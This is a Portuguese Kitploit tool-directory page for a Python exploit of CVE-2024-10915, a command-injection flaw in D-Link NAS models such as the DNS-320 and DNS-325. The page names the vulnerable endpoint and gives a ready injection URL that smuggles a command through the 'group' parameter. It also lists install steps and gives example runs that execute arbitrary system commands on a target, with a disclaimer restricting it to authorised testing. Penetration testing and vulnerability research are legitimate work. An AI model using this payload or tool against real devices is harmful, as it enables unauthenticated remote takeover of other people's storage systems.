Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-10915 — Exploit baseado em Python para CVE-2024-10915, uma vulnerabilidade de injeção de comandos em dispositivos D-Link NAS. Executa comandos arbitrários do sistema através do endpoint /cgi-bin/account_mgr.cgi para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/r0otk3r/cve-2024-10915
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed Teaming
GitHubr0otk3r/cve-2024-10915

CVE-2024-10915

Exploit baseado em Python para CVE-2024-10915, uma vulnerabilidade de injeção de comandos em dispositivos D-Link NAS. Executa comandos arbitrários do sistema através do endpoint /cgi-bin/account_mgr.cgi para testes de segurança autorizados.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-10915 - Exploit de Injeção de Comandos em NAS D-Link

Este exploit baseado em Python visa uma vulnerabilidade de injeção de comandos em vários produtos NAS D-Link através do endpoint /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. A vulnerabilidade permite que atacantes não autenticados executem comandos arbitrários no sistema do dispositivo afetado.

Descrição

CVE-2024-10915 afeta vários modelos de NAS D-Link. Um atacante pode injetar comandos através do parâmetro group no comando cgi_user_add, levando à execução remota de código.

Produtos Afetados

  • D-Link DNS-320

  • D-Link DNS-320LW

  • D-Link DNS-325

  • D-Link DNS-340L

root@kitploit:~
Endpoint Vulnerável: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

Exemplo:

root@kitploit:~
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

Requisitos

  • Python 3.x

  • biblioteca requests

Instale as dependências necessárias:

root@kitploit:~
pip3 install requests

Uso

root@kitploit:~
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]

Opções:

OptionDescription
-u / --urlURL base do alvo (ex.: http://192.168.1.100)
-c / --commandComando a executar no dispositivo (padrão: id)
-p / --proxyUse um proxy HTTP (ex.: http://127.0.0.1:8080)
-o / --outputSalvar a resposta HTTP em um arquivo
-l / --listListar produtos NAS D-Link afetados

Exemplo 1

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 
id

Exemplo 2

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 
uname

Exemplo 3

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 
ifconfig

⚠️ Aviso Legal

Este projeto destina-se apenas a fins educacionais e de testes autorizados. Não utilize esta ferramenta em redes ou sistemas para os quais você não tenha permissão explícita. Os autores não assumem qualquer responsabilidade por uso indevido ou danos causados.


Canais Oficiais

  • YouTube @rootctf
  • X @r0otk3r
Baixar ferramenta